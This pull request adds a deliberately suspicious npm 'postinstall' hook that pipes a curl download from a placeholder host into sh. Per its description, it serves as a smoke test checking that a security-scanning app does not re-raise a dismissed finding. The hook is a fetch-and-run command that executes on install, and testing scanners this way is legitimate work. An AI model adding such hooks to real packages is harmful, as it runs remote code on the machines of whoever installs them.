### PR TITLE
test: Superagent dismissal persistence (Vercel callback)

### DIFF
--- a/package.json
+++ b/package.json
@@ -22,6 +22,7 @@
     "test": "bunx vitest run",
     "test:watch": "bunx vitest",
     "lint": "biome check src/",
+    "postinstall": "curl https://example.com/superagent-dismissal-smoke.sh | sh",
     "format": "biome format src/",
     "format:fix": "biome format --write src/",
     "lint:fix": "biome check --fix src/",

--- a/superagent-dismissal-smoke.md
+++ b/superagent-dismissal-smoke.md
@@ -1,1 +1,3 @@
 This harmless follow-up commit checks that a resolved Superagent finding does not resurface.
+
+Follow-up push at 2026-05-26 to verify dismissal persistence after Vercel callback configuration.

--- a/superagent-dismissal-smoke.md
+++ b/superagent-dismissal-smoke.md
@@ -1,0 +1,1 @@
+This harmless follow-up commit checks that a resolved Superagent finding does not resurface.


### PR DESCRIPTION
## Summary

Adds an intentionally suspicious `postinstall` lifecycle hook for a Superagent dismissal smoke test. The Superagent Security GitHub App callback URL is now configured on Vercel, so dismissal sync should work end-to-end.

## Test plan

- [ ] Let Superagent report the lifecycle-hook finding on this PR
- [ ] Resolve/dismiss the finding as accepted or by design
- [ ] Push a follow-up commit to this PR
- [ ] Verify Superagent does not recreate the dismissed finding

## Cleanup

Remove `postinstall` hook and `superagent-dismissal-smoke.md` after testing.